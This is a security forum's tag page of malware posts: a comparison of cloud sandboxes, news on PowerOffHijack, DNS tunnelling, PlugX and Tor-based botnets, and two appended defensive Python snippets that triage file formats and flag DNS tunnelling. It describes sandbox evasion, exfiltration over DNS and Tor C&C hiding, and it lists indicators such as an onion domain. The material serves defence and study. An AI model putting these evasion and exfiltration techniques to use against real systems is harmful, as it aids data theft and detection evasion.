Showing results for tags 'malware'.

  1. In this section, we’re providing a list of cloud automated online malware analysis tools that are not available anymore due to the website being offline or the service being disrupted by the creators of the analysis environment.

     • Aerie: https://aerie.cs.berkeley.edu
     • CWSandbox: The Sandbox | Understanding CyberForensics
     • ThreatTrack: http://www.treattrack.com
     • Malbox: Malbox System
     • VisualThreat: http://www.visualthreat.com
     • XecScan: http://scan.xecure-lab.com
     • Norman Sandbox: https://www.norman.com/analysis

     Despite quite a few analysis tools being unavailable, there are still a lot of them being actively supported and developed. The online malware analysis tools that are still present on the Internet are presented below. Each of the tools has a letter written in square brackets, which is used later on to present each of the tools in a table in order to preserve space and provide clearer results. Each of the tools also has a URL address of where the service is available in case you want to submit different files for analysis.

     • [A] Anubis: http://anubis.iseclab.org
     • [C] Comodo: http://camas.comodo.com
     • [D] Document Analyzer: http://www.document-analyzer.net
     • [E] Eureka: http://eureka.cyber-ta.org
     • [J] Joe Sandbox: http://www.joesecurity.org
     • [M] Malwr: https://malwr.com/submission
     • [MS] Mobile Sandbox: http://mobilesandbox.org
     • [TE] Threat Expert: http://www.threatexpert.com/submit.aspx
     • [TT] Threat Track: http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx
     • [V] Vicheck: https://www.vicheck.ca
     • [X] Xandora: http://www.xandora.net/xangui

     Note that there are other cloud malware analysis platforms, but we didn’t take them into consideration in this article. Therefore, some of them are not presented and described below.
     Supported file formats and document types

     Since malware can be hidden in almost any file format or document type, malware analysis tools must provide support for such formats or document types in order to be able to detect the threat inside it. For example: if an attacker has hidden a malicious payload inside a PDF document, the malware analysis tool must have PDF support to be able to manipulate PDF documents. If PDF support is not present, the dissection of a PDF document will not be possible, and consequently the tool will not be able to find the malicious payload. If we look at the PDF document through the eyes of a malware analysis tool, the PDF document is just a set of random bytes.

     The attackers mostly use the file formats, document types and other elements presented below for including malicious payloads. The majority of presented elements need no further introduction, since they are used in our everyday lives, but we will still provide a brief explanation of each of them.

     • exe: Windows PE executable files normally used for Windows executable programs.
     • elf: Linux ELF executable files normally used for Linux executable programs.
     • mach-o: Mac OS X Mach-O executable files normally used for Mac executable programs.
     • apk: Android APK executable files
     • url: URLs
     • pdf: PDF documents
     • doc/docx: DOC/DOCX documents
     • ppt/pptx: PPT/PPTX documents
     • xsl/xsls: XSL/XSLS documents
     • htm/html: HTM/HTML web pages
     • jar: JAR Java executable files
     • rtf: RTF documents
     • dll: DLL libraries
     • db: DB database files
     • png/jpg: PNG/JPG images
     • zip/rar: ZIP/RAR archives
     • cpl: Control Panel Applets
     • ie: Analyze Internet Explorer process when opening a URL
     • ps1: PowerShell scripts
     • python: Python scripts
     • vbs: VBScript files

     The table below presents supported file formats and document types of each cloud automated malware analysis service.
     The rows represent file formats or document types, while the columns are used for each of the automated malware analysis tools presented by one or two letters (as presented before). The ✓ is used to denote that a certain file format or document type is supported by an automated malware analysis service, while an empty cell indicates otherwise. The * is used to mark that the support for the document type is being implemented, but not yet available, at the time of this writing.

     Table 1: supported document types by different malware analysis tools
     (columns: A, C, D, E, J, M, MS, TE, TT, V, X)

     exe        ✓ ✓ ✓ ✓ ✓ ✓ ✓
     elf        *
     mach-o     ✓
     apk        ✓ ✓ ✓
     url        ✓ ✓
     pdf        ✓ ✓ ✓ ✓
     doc/docx   ✓ ✓ ✓ ✓
     ppt/pptx   ✓ ✓ ✓
     xsl/xsls   ✓ ✓ ✓ ✓
     rtf        ✓
     htm/html   ✓ ✓
     jar        ✓ ✓
     dll        ✓ ✓
     db         ✓
     png/jpg    ✓
     zip/rar    ✓ ✓
     cpl        ✓
     ie         ✓
     ps1        ✓
     python     ✓
     vbs        ✓

     I’ve spent quite some time putting together the table above, which summarizes the supported file formats, document types and other kinds of elements that can be analyzed in an automated fashion. From the table, we can quickly determine that there isn’t a service that can be used to analyze any kind of file, which is because the malicious code is included in files and documents in a profoundly different manner. When adding malicious code to an executable file, we can do so by including malicious assembly instructions in its .text file section – and that is only one of the ways of doing it. On the other hand, when including malicious code in a .docx document, we usually include it in the form of a malicious macro, which will get executed by Microsoft Word upon opening the document.

     Below we’ve presented different categories for categorizing the file formats, document types and other elements presented in the table above. In each of the categories we’ll also briefly discuss how the malicious code gets executed and what is needed for cloud automated malware analysis of such code.
     • Executable Files [exe, elf, mach-o, apk, dll]: a malicious executable file is distributed around the Internet, which is downloaded by users in the form of cracked software programs and cracked games. The users download a program believing it to be something they want, which it is, but additional code is usually appended to the file containing a malicious payload that gets executed on the user’s computer and therefore infecting it.
     • Documents [pdf, doc/docx, ppt/pptx, xsl/xsls, rtf]: vulnerabilities are discovered in different software programs on a daily basis. Therefore, if an attacker finds a vulnerability in Acrobat Reader (supports the pdf file format) or Microsoft Word/OpenOffice (supports doc/docx, ppt/pptx, xsl/xslx, rtf), they can form such a document that the program won’t be able to process the file, but will crash instead. Depending on the type of vulnerability, an attacker can possibly execute a malicious payload included in the document.
     • Web browser [url, htm/html, jar, ie]: web browsers also contain vulnerabilities, as PDF Reader and Office Suite do. Therefore, an attacker can create a malicious website the web browser will not be able to handle, which will lead to the web browser crashing, during which an attacker can execute arbitrary code.
     • Archives [zip/rar]: archives can be used to distribute malicious files around the Internet. If a malicious file is put inside a password protected archive, the usual analysis solutions won’t be able to take a look inside the archive and determine whether it contains malicious files.
     • Images [png/jpg]: an attacker can hide a malicious payload inside an image, which can be processed by a vulnerable web application running on an incorrectly set up web server. Therefore, an analysis solution should be able to parse various image file formats in order to determine whether they contain anything out of the ordinary, like a malicious payload.
     • Code [python, vbs, ps1]: an attacker can also distribute malicious code written in an appropriate programming/scripting language, which is later processed by some application on the victim’s machine. An example of such is a PowerShell (ps1) macro included in a Word document, which gets executed on a user’s request when allowing the execution of macros upon opening a malicious .docx document in Microsoft Word.

     Techniques for Detecting Automated Environments

     Various techniques exist for detecting automated malware analysis environments, which are being incorporated in malware samples. When malware binaries are using different checks to determine whether they are executing in a controlled environment, they usually don’t execute malicious actions upon environment detection. The picture below presents an overview of malware and the techniques it can use to detect if it’s being executed in an automated environment. In order to make the picture clearer, we’ll describe the process in detail.

     Once the malware has infected the system, it can be running in user or kernel-mode, depending upon the exploitation techniques. Usually malware is running in user-mode, but there are multiple techniques for malware to gain additional privileges to execute in kernel-mode. Whether malware is executed in user or kernel-mode, there are multiple techniques malware can use to detect if it’s being executed in an automated malware analysis environment. At the highest level, the techniques are divided into the following categories:

     • Detect a Debugger: debuggers are mostly used when a malware analyst is manually inspecting a malware sample in order to gain an understanding of what it does. Debuggers are not frequently used in automated malware analysis, but different techniques can still be incorporated into the malware sample to make debugging the malware sample more difficult.
     • Anti-Disassembly Tricks: this category isn’t directly related to automated malware analysis environments, but when an analyst is manually reviewing the malware sample in a debugger, malware can use different techniques to confuse disassembly engines into producing incorrect disassembled code. This is only useful when a malware analyst is analyzing the malware sample manually, but doesn’t have much impact in automated malware analysis environments.
     • Detect a Sandbox Environment: a sandbox is an environment separate from the main operating system where malware samples can be run without causing any harm to the rest of the system. The primary purpose of a sandbox environment is to emulate different parts of the system, or the whole system, to separate the guest system from the host system. Depending on the virtualization layer, there are different types of sandboxes, which are presented below.

       • Virtualized Programs: Chromium Sandbox, Sandboxie
       • Linux Containers: LXC, Docker
       • Virtualized Environment: VirtualPC, VMware, VirtualBox, QEMU

     Each automated malware analysis tool uses different backend systems to run the malware in a controlled environment. Malware can be run in physical machines or virtual machines. Note that old unused physical machines lying around at home would be a perfect candidate for setting up a malware analysis lab, which would make it considerably more difficult for malware binaries to determine whether they are being executed in a controlled environment. When building our own malware analysis lab, we have to connect multiple machines together to form a network, which can be done simply by a virtual or physical switch, depending on the type of machines used. Each cloud automated malware analysis service uses some kind of virtualization environment to run their malware samples, like Qemu/KVM, VirtualBox, VMWare, etc.
     According to the virtualization technology being used, a malware sample can use different techniques to detect that it’s being analyzed and terminate immediately. Thus the malware sample will not be flagged as malicious, since it terminated preemptively without executing the malicious code.

     In this section we’ve seen that different cloud malware analysis services use different virtualization technologies to run submitted malware samples. As far as I know, only Joe Sandbox has an option of running malware samples on actual physical machines, which prevents certain techniques from being used in malware samples to detect if they are being run in an automated malware analysis environment. Still, there are many other techniques malware can use to detect if it’s being analyzed. This is a cat and mouse game, where new detection techniques are invented and used by malware samples on a daily basis. On the other hand, there are numerous anti-detection techniques used to prevent the malware from determining it’s being executed in an automated malware analysis environment. When a new detection technique appears, usually a new anti-detection technique is put together to render the detection technique useless.

     Conclusion

     In this article we’ve presented the differences between multiple cloud malware analysis services that can be used to analyze different file formats and document types. Each service supports only a fraction of all file formats and document types in which malicious code can be injected. Therefore, depending on the file we have to analyze, we can use the services that support its corresponding file format or document type. In order to analyze a document, we have to choose the appropriate service in order to do so. Since there are many techniques an attacker can use to determine whether the malicious payload is being executed in an automated malware analysis environment, some malicious samples won’t be analyzed correctly, resulting in false positives.
     Therefore, such services should only be used together with a reverse engineer or malware analyst in order to manually determine whether the file is malicious or not. Since there are many malicious samples distributed around the Internet on a daily basis, every sample cannot be manually inspected, which is why cloud automated malware analysis services are a great way to speed up the analysis.

     Source
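As an added example (not code from the article above), the Python below does the triage step the article implies: it identifies a sample's real container format from its leading bytes so it can be routed to a service that supports that format, and it flags password-protected ZIP archives, which the article notes the usual services cannot look inside. The magic values are the documented file signatures; the sample files, the `triage` function and its labels are constructed for illustration.

```python
"""Added example: classify a sample by magic bytes and detect encrypted ZIPs.
Format labels follow the article's Table 1; sample files are built inline."""
import io
import struct
import zipfile

# (signature, article's format label) pairs, matched against the leading bytes.
MAGIC = [
    (b"MZ", "exe/dll"),                                 # Windows PE (DOS header)
    (b"\x7fELF", "elf"),                                # Linux ELF
    (b"\xfe\xed\xfa\xce", "mach-o"),                    # Mach-O 32-bit, big-endian
    (b"\xcf\xfa\xed\xfe", "mach-o"),                    # Mach-O 64-bit, little-endian
    (b"%PDF", "pdf"),
    (b"{\\rtf", "rtf"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "doc/ppt/xsl (OLE2)"),  # legacy Office
    (b"Rar!\x1a\x07", "zip/rar"),                       # RAR v4/v5
    (b"\x89PNG\r\n\x1a\n", "png/jpg"),
    (b"\xff\xd8\xff", "png/jpg"),                       # JPEG SOI marker
    (b"PK\x03\x04", "zip"),                             # ZIP family: refined below
]


def classify(data: bytes) -> str:
    """Map a sample's leading bytes to one of the article's format labels."""
    for sig, label in MAGIC:
        if data.startswith(sig):
            return classify_zip(data) if label == "zip" else label
    return "unknown"


def classify_zip(data: bytes) -> str:
    """docx/pptx/xlsx, apk and jar are all ZIPs; tell them apart by member names."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return "zip/rar"
    if "AndroidManifest.xml" in names:
        return "apk"
    if "META-INF/MANIFEST.MF" in names:
        return "jar"
    if any(n.startswith("word/") for n in names):
        return "doc/docx"
    if any(n.startswith("ppt/") for n in names):
        return "ppt/pptx"
    if any(n.startswith("xl/") for n in names):
        return "xsl/xsls"
    return "zip/rar"


def zip_is_encrypted(data: bytes) -> bool:
    """True if any ZIP local file header sets bit 0 of the general-purpose flag
    (offset 6); such members need a password before any service can look inside."""
    pos = data.find(b"PK\x03\x04")
    while pos >= 0 and pos + 8 <= len(data):
        (flags,) = struct.unpack_from("<H", data, pos + 6)
        if flags & 0x1:
            return True
        pos = data.find(b"PK\x03\x04", pos + 4)
    return False


def triage(data: bytes) -> dict:
    """Decide what a sample is and whether an analysis service could open it."""
    fmt = classify(data)
    encrypted = data.startswith(b"PK\x03\x04") and zip_is_encrypted(data)
    return {"format": fmt, "encrypted_archive": encrypted}


def make_zip(members: dict) -> bytes:
    """Constructed sample: an in-memory ZIP with the given member files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def make_encrypted_zip() -> bytes:
    """Constructed sample: a ZIP whose local header carries the encryption flag
    (the data itself is left in clear; only the flag matters for triage)."""
    data = bytearray(make_zip({"payload.bin": b"x" * 16}))
    pos = data.find(b"PK\x03\x04")
    (flags,) = struct.unpack_from("<H", data, pos + 6)
    struct.pack_into("<H", data, pos + 6, flags | 0x1)
    return bytes(data)


if __name__ == "__main__":
    samples = {
        "pe": b"MZ" + b"\x00" * 62,
        "docx": make_zip({"[Content_Types].xml": b"", "word/document.xml": b"<w/>"}),
        "locked": make_encrypted_zip(),
    }
    for name, blob in samples.items():
        print(name, triage(blob))
```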
  2. Security researchers have unearthed a new Android Trojan that tricks victims into believing they have switched their device off while it continues "spying" on the users' activities in the background. So, next time be very sure while you turn off your Android smartphones.

     The new Android malware threat, dubbed PowerOffHijack, has been spotted and analyzed by the researchers at the security firm AVG. It is called PowerOffHijack because the nasty malware has a very unique feature - it hijacks the shutdown process of the user’s mobile phone.

     MALWARE WORKS AFTER SWITCHING OFF MOBILES

     When users press the power button on their device, a fake dialog box is shown. The malware mimics the shutdown animation and the device appears to be off, but actually remains on, giving the malicious program freedom to move around on the device and steal data.

     HOW DOES POWEROFFHIJACK MALWARE WORK?

     Once installed, the malware asks for root-level permissions and tampers with the 'system_server' file of the operating system to affect the shutdown process. The malware particularly hijacks the mWindowManagerFuncs interface, so that it can display a fake shutdown dialog box and animation every time the victim presses the power button. The nasty malware is apparently being propagated via third-party online app stores, but the researchers haven't mentioned the names of the innocent-looking apps, and they haven’t explained how the malware gains root access to the device. The code shown by AVG appears to contact Chinese services.

     USERS AND ANDROID VERSIONS INFECTED

     According to the company, PowerOffHijack malware infects devices running Android versions below 5.0 (Lollipop) and requires root access to perform the tasks. So far, PowerOffHijack malware has already infected more than 10,000 devices, mostly in China where the malware was first introduced and offered through the local, official app stores.
     PowerOffHijack malware has the ability to silently send lots of premium-rate text messages, make calls to expensive overseas numbers, take photos and perform many other tasks even if the phone is supposedly switched off.

     EASY STEPS TO GET RID OF POWEROFFHIJACK

     In order to get rid of PowerOffHijack malware, users are advised to take some simple steps:

     • To restart the infected device manually, just take out the battery.
     • Remove malicious, untrusted and useless apps from your Android device.
     • Do not install apps from 3rd party app stores.
     • Make sure you have a good anti-virus installed and updated on your mobile devices. The AVG antivirus product can detect PowerOffHijack malware.

     Source
  3. CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline but over the last several months malware creators have taken to using DNS requests to tunnel stolen data.

     Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday. Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells, and PowerShell scripts to download other payloads to use within attacks.

     For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the TXT records, CNAME records, NULL records and on occasion AAAA records.

     As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy. “There’s a bunch of software that are using DNS in a weird way,” Blasco said.

     One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR. Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while, and PlugX, a remote administration tool that’s existed in some incarnation since 2008 but has been making a return as of late, also turned up.

     Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said.

     Source
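As an added example (not code from Blasco's talk or the article), the Python below scores a constructed DNS query log against the indicators the post lists: labels near the 63-octet maximum, names near the 255-octet limit, encoded-looking subdomains, large TXT/NULL/CNAME/AAAA answers, and a per-client spike in query volume. The log format, the thresholds and the simulated tunnelling client are assumptions made for this illustration.

```python
"""Added example: DNS tunnelling indicators over a constructed query log."""
import math
from collections import Counter, defaultdict

# Record types the talk names as downstream (server-to-bot) channels.
DOWNSTREAM_TYPES = {"TXT", "NULL", "CNAME", "AAAA"}


def shannon_entropy(text: str) -> float:
    """Bits per character; base32/base64 chunks score far higher than hostnames."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def query_indicators(qname: str, qtype: str, answer_bytes: int) -> list:
    """Return the tunnelling indicators a single query/answer pair trips.
    Thresholds are this example's assumptions, not values from the talk."""
    labels = qname.rstrip(".").split(".")
    hits = []
    if max(len(label) for label in labels) >= 50:   # labels are capped at 63 octets
        hits.append("label near 63-octet maximum")
    if len(qname.rstrip(".")) >= 200:               # names are capped at 255 octets
        hits.append("name near 255-octet maximum")
    if len(labels) >= 6:
        hits.append("unusually many labels")
    subdomain = "".join(labels[:-2])                # assumes a two-label registrable domain
    if len(subdomain) >= 20 and shannon_entropy(subdomain) >= 3.8:
        hits.append("high-entropy (encoded-looking) subdomain")
    if qtype in DOWNSTREAM_TYPES and answer_bytes >= 200:
        hits.append(f"large {qtype} answer ({answer_bytes} bytes)")
    return hits


def parse_line(line: str):
    """Constructed log format: '<epoch_seconds> <client_ip> <qname> <qtype> <answer_bytes>'."""
    ts, client, qname, qtype, size = line.split()
    return int(ts), client, qname, qtype, int(size)


def analyse(log_lines, window_seconds: int = 60, spike_threshold: int = 50) -> dict:
    """Flag suspicious queries and clients whose query count spikes within a window."""
    flagged = []
    per_client_buckets = defaultdict(Counter)
    for line in log_lines:
        ts, client, qname, qtype, size = parse_line(line)
        per_client_buckets[client][ts // window_seconds] += 1
        hits = query_indicators(qname, qtype, size)
        if hits:
            flagged.append({"client": client, "qname": qname,
                            "qtype": qtype, "indicators": hits})
    spikes = {client: max(buckets.values())
              for client, buckets in per_client_buckets.items()
              if max(buckets.values()) >= spike_threshold}
    return {"flagged_queries": flagged, "spiking_clients": spikes}


def constructed_log() -> list:
    """Benign traffic from one host plus a simulated tunnelling client.
    The encoded labels are derived from a fixed pattern so the run is deterministic."""
    lines = [
        "1 10.0.0.5 www.example.com A 4",
        "2 10.0.0.5 mail.example.com MX 30",
        "3 10.0.0.5 cdn-static-assets.example.com CNAME 40",
    ]
    alphabet = "abcdefghijklmnopqrstuvwxyz234567"    # base32 alphabet
    for i in range(60):
        # one upstream chunk per query: a 60-char pseudo-encoded label plus a sequence label
        chunk = "".join(alphabet[(i * 7 + k * 11) % 32] for k in range(60))
        lines.append(f"{5 + i} 10.0.0.7 {chunk}.{i:04d}.t.tunnel-example.net TXT 600")
    return lines


if __name__ == "__main__":
    report = analyse(constructed_log())
    print(len(report["flagged_queries"]), "suspicious queries")
    print("clients with query spikes:", report["spiking_clients"])
    print("first hit:", report["flagged_queries"][0]["indicators"])
```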
  4. Existing in some form since 2008, the popular remote access tool PlugX has as notorious a history as any malware, but according to researchers the tool saw a spike of popularity in 2014 and is the go-to malware for many adversary groups.

     Many attacks, especially those occurring during the latter half of the year, were seen using the tool. In fact, researchers are theorizing the further proliferation of PlugX, which enables attackers to log keystrokes, modify and copy files, capture screenshots, as well as the ability to quit processes, log users off, and completely reboot users’ machines, could suggest eventual worldwide adoption.

     The malware was the most used variant when it came to targeted activity in 2014 according to Crowdstrike’s Global Threat Report, released today. Despite kicking around for years, the malware is now the de facto tool for dozens of China-based adversarial groups the firm tracks.

     One of the ways the malware improved itself in 2014, and in turn caught on, was by switching up the way it communicates with its infrastructure further up the chain. By implementing a newer DNS command and control module, the malware has been able to send its data in the form of long DNS queries to its overseeing infrastructure. By modifying the way the DNS and HTTP requests are produced, something Crowdstrike is calling a deviation from “some of the more typically monitored protocols,” it’s made it more difficult to be detected over the past year or so.

     “The upward trend in use of PlugX indicates an increasing confidence in the capabilities of the platform, justifying its continued use across multiple sectors and countries,” according to the report.

     One of the groups that Crowdstrike caught dropping PlugX on machines was a hacking collective it calls Hurricane Panda, who used the malware’s custom DNS feature to spoof four DNS servers, including popular domains such as Pinterest.com, Adobe.com, and Github.com. Instead of their legitimate IP addresses, the malware was able to instead point these domains to a PlugX C+C node.

     The malware, as has been the case in the past, is commonly delivered via a spear phishing attack. Some of the attacks go on to leverage a zero day from last March, CVE-2014-1761, which exploits vulnerable Microsoft RTF or Word documents. Others, meanwhile, make use of well-worn holes like CVE-2012-0158 in PowerPoint and Excel, that were also used by the IceFog, Red October, and Cloud Atlas attacks.

     While some of the groups using PlugX have gone out of their way to register new domains for leveraging the malware’s C+C, many domains from the last several years remain active, something else that Crowdstrike has attributed to the malware’s success and persistence over the years.

     The firm has two schools of thought when it comes to rationalizing how the malware has become so commonplace. It’s thought that there’s either a central malware dissemination channel that’s pushing PlugX out to adversary groups or that groups that hadn’t used PlugX in the past have recently been able to get copies of it via public repositories or the cybercrime underground.

     Either way, while the malware is mostly used by attackers from “countries surrounding China’s sphere of influence,” the report suggests that trend could change soon enough. The malware has been used in recurring attacks against commercial entities in the U.S., and in other politically fueled attacks, but its rapid deployment “could be a precursor to future worldwide use,” according to Crowdstrike. “The ongoing development of PlugX provides attackers with a flexible capability that requires continued vigilance on the part of network defenders in order to detect it reliably.”

     Source
  5. Zemana AntiMalware 2 is a second opinion cloud-based multi-engine malware and virus scanner designed to rescue your computer from all types of viruses and malware that have infected your computer despite all the other security measures you have in place. Zemana AntiMalware 2 helps remove unwanted apps, annoying toolbars or browser add-ons and rapidly neutralizes viruses, trojans, rootkits, worms, spyware, and adware. Because of how it works, you can use Zemana AntiMalware 2 side-by-side along with most regular anti-virus programs without conflict. Best of all, Zemana AntiMalware 2 comes in both installer and portable versions, so you can pick whichever one suits your needs best.

     Link: Free Zemana AntiMalware 2 (100% discount)
  6. Introduction

     Botnets are still considered one of the most dangerous cyber threats. These malicious networks of compromised machines are used by cyber criminals and state-sponsored hackers for numerous activities, including DDoS attacks, spam campaigns, and financial scams. The principal problem for a botmaster is to make a botnet resilient against operations run by law enforcement. For operators it is essential to hide Command and Control servers and network traffic to avoid takeover of the malicious infrastructure. The Tor network offers a privileged environment for botmasters that could exploit the popular anonymizing network to hide the C&C servers.

     Tor botnets

     During the Defcon Conference in 2010, security engineer Dennis Brown discussed Tor-based botnets, highlighting the pros and cons of the choice to hide C&C servers in the Tor network. The principal advantages of Tor-based botnets are:

     • Availability of Authenticated Hidden Services
     • Availability of Private Tor Networks
     • Possibility of Exit Node Flooding

     Security researchers use traffic analysis to detect botnet activities and to localize the C&C servers. Typically they do this by using Intrusion Detection Systems and network analyzers. Once they’ve detected a botnet, the researchers and law enforcement have different options to eradicate it:

     • Obscuration of the IP addresses assigned to the C&C server
     • Cleaning of the server hosting the botnet and of the compromised hosts
     • Domain name revoke
     • Hosting provider de-peered

     The botnet traffic is routed to the C&C server through the Tor network that encrypts it, making its analysis more difficult. Brown proposed the following two botnet models that exploit the Tor network:

     • “Tor2Web proxy based model”
     • “Proxy-aware malware over Tor network”

     “Tor2Web proxy based model”

     The routing mechanism relies on the Tor2Web proxy to redirect .onion web traffic.
     The bot has to connect to the hidden service passing through the Tor2Web proxy pointing to an onion address that identifies the C&C server that remains hidden. The principal problem related to this approach is that it is easy to filter Tor2Web traffic, and a similar configuration could suffer from considerable latencies due to the Tor network that could make a botnet built with this approach unresponsive.

     “Proxy-aware Malware over Tor network”

     This approach is based on making use of proxy-aware malware. Due to the absence of the Tor2Web service, the bot agents have to run Tor clients on the infected hosts. The main difference with respect to the first solution is in the requirements for the bot agents and their configuration. Bots need to have SOCKS5 support to reach .onion addresses through the Tor network by loading Tor on the victims’ systems. This second approach is more secure because traffic isn’t routed through a proxy and it is entirely within the Tor network due to the direct connection between Bots and C&C servers. This configuration avoids traffic interception from exit nodes that are not involved in the architecture. This approach is more complex from a Bot perspective due to the complexity in managing the SOCKS5 interface and in botnet synchronization. This kind of botnet could be easily detected by the presence of Tor traffic on a network.

     Strengths and weaknesses of Tor botnets

     Among the strengths:

     • Botnet traffic masquerades as legitimate Tor traffic
     • Encryption prevents most Intrusion Detection Systems from finding botnet traffic
     • P2P architecture makes botnets more resilient to take down
     • Difficulty for the localization of the command and control servers (C&C)
     • Hidden Services provide a Tor-specific .onion pseudo top-level domain, which is not exposed to possible sinkholing. The operator can easily move around the C&C servers just by re-using the generated private key for the Hidden Service.
     Among the weaknesses:

     • Complexity of botnet management
     • Risk of botnet fragmentation
     • Latency in the communication

     Tor botnets: real cases

     The Skynet botnet

     One of the first examples of a Tor based botnet is the Skynet botnet that was discovered in December 2012 by experts at G-Data and Rapid7. The bot was a strain of the popular Zeus trojan, which included a Tor client for Windows and a bitcoin mining tool. The researchers at G-Data also reported that Skynet used hidden IRC services with Tor to control the malicious architecture. The Skynet botnet can fulfill different tasks such as mining bitcoin or providing bot agents to involve in illegal activities such as DDoS attacks or spam campaigns.

     Figure 1 – Tor botnet

     Mevade botnet

     Going forward in time, we find the Mevade botnet (a.k.a. Sefnit, LazyAlienBiker). In September 2013 it caused a spike in the number of Tor users, which reached 5 million active users.

     Figure 2 – Tor metrics: Mevade spikes Tor users

     Authors of Mevade’s Tor variant appear to use the Russian language. The purpose of the botnet was the installation of adware and toolbars onto the victims’ systems, mining Bitcoin and stealing sensitive information from the infected PC. Experts at TrendMicro revealed that the Mevade malware also had a “backdoor component and communicates over SSH to remote hosts” that made the agent ideal for data theft.

     The Atrax crimekit

     In November 2013, researchers from Danish security firm CSIS discovered a new crimekit, dubbed Atrax, which was sold in the underground market. One of the main features implemented by its authors is the ability to exploit Tor networks to communicate with Command & Control servers.
     The Atrax crimekit was cheap – it was offered for $250, and among the other features implemented by its authors, there were:

     • Virtual currency mining (Bitcoin mining and Litecoin mining)
     • Browser data extraction
     • Availability of a module to run DDoS attacks that offers complete support for both Full IPv6 and IPv4 and implements principal attack techniques including UDP Flood, TCP Flood, TCP Connect Flood, HTTP Slowloris, and many other methods.
     • Data stealing, including Bitcoin wallets (such as Armory, Bitcoin-Qt, Electrum and Multibit).

     Figure 3 – Atrax crimekit

     The Atrax crimekit has a modular structure. The malware includes a series of add-ons that implement the functionalities described. A plugin which implements a data stealer was sold for $110, the form grabber runs for $300, and an experimental add-on for coin mining was sold for $140. It’s interesting to note that the Atrax crimekit was sold with free updates, bug fixes and support. Below is a list of standard features present in the Atrax crimekit:

     • Kill
     • Update
     • Download (over Tor), Execute (Commandline-Parameter allowed)
     • Download (over Tor), Execute (Commandline-Parameter allowed) in memory
     • Install Plugin
     • Installation List (A list with all installed applications)

     64-bit ZeuS banking trojan using Tor network

     In December 2013, security researchers at Kaspersky Lab detected a new strain of the popular Zeus trojan. The new variant was designed to operate on 64-bit, and the authors enhanced the malicious code with support for communication through the Tor network. This version of the popular banking trojan also used a web injection mechanism to steal banking credentials from the victim’s browser. It was also able to steal digital certificates and implement a keystroke feature. The authors implemented a communication mechanism with the C&C server over the Tor network, a feature that makes it more difficult for law enforcement and security firms to track botnets.
     The 64-bit version of the Zeus banking trojan executes a Tor component, starting the svchost application in suspended mode and then injecting the Tor code into that process, running it in a stealth mode. The malicious traffic was routed through TCP port 9050 and the stolen data were sent to the onion domain with address egzh3ktnywjwabxb [.] onion.

     “Tor.exe is launched indirectly — ZeuS starts the system svchost.exe application in suspended mode, then injects the tor.exe code into this suspended svchost.exe process, tunes the code to run properly and resumes execution of the suspended svchost,” Tarakanov explains. “As a result, instead of the system svchost.exe, the process actually starts executing tor.exe,” states the blog post published on SecureList.

     Figure 4 – The Tor utility under the cover of the svchost.exe process creates an HTTP proxy server

     Another peculiarity of the malware is that it instantiates a hidden service that creates a configuration file for every victim, which includes a unique private key for the service and an exclusive domain. The feature allows the botmaster to control the architecture via Tor.

     “The botnet operator will be aware of the generated onion domain related to every infected machine as the malware informs the CnC about its tor domain name. So, when an infected machine is online the botnet operator can reach it connecting to its unique onion domain via the Tor network. One purpose of this approach is the remote control of the infected host. For example, one of these ports specifically listens to in the VNC function of ZeuS, obviously meaning that ZeuS provides remote desktop control to the operator via this port,” continues the post.

     This version of the Zeus trojan was able to trigger its execution after one program within a list of 100 predefined applications is started.
ChewBacca financial malware

In early 2014 the researchers at RSA discovered a variant of the banking Trojan ChewBacca that was used to steal credit card data from infected POS systems. Also in this case, the botnet was controlled by servers hidden in the Tor network. According to the experts at RSA, the botnet based on the ChewBacca POS variant had been used against customers in at least 11 countries (including the US, Russia, Canada and Australia) since October 25, 2013. The malware was able to steal credit card data with “keylogger” capabilities or by dumping the memory content of POS systems in search of credit card details. The bot is able to collect track 1 and track 2 data of payment cards during purchases.

“Chewbacca code was compiled with Free Pascal 2.7.1. Once executed on a Windows based system, it drops as spoolsv.exe in the startup folder and also drops a copy of Tor 0.2.3.25.”

“After execution, the function “P$CHEWBACCA$_$TMYAPPLICATION_$__$$_INSTALL” is called, which drops itself as “spoolsv.exe” into the “Startup folder” (e.g. C:\Documents and Settings\All Users\Start Menu\Programs\Startup) and requests the public IP of the victim via a publicly accessible service at http://ekiga.net/ip (which is not related to the malware). Tor is dropped as “tor.exe” to the user’s Temp and runs with a default listening on “localhost:9050”.”

Figure 5 – ChewBacca console

The Bifrose malware

In August 2014, researchers from TrendMicro detected a new variant of the Bifrose malware leveraging the Tor network. The new variant of the Bifrose backdoor was used in a targeted attack against a device manufacturer. Bifrose has been around for many years, and it is quite easy to acquire in the underground. The malware has a data stealing ability, but it is mostly popular for its keylogging routines.
The variant detected by the malware experts at TrendMicro (detected as BKDR_BIFROSE.ZTBG-A – hash 5e2844b20715d0806bfa28bd0ebcba6cbb637ea1) leverages the Tor network to hide communications between the infected machines and the C&C server.

“What makes this variant more elusive is its ability of Tor to communicate with its command-and-control [C&C] server,” reports a blog post published by TrendMicro.

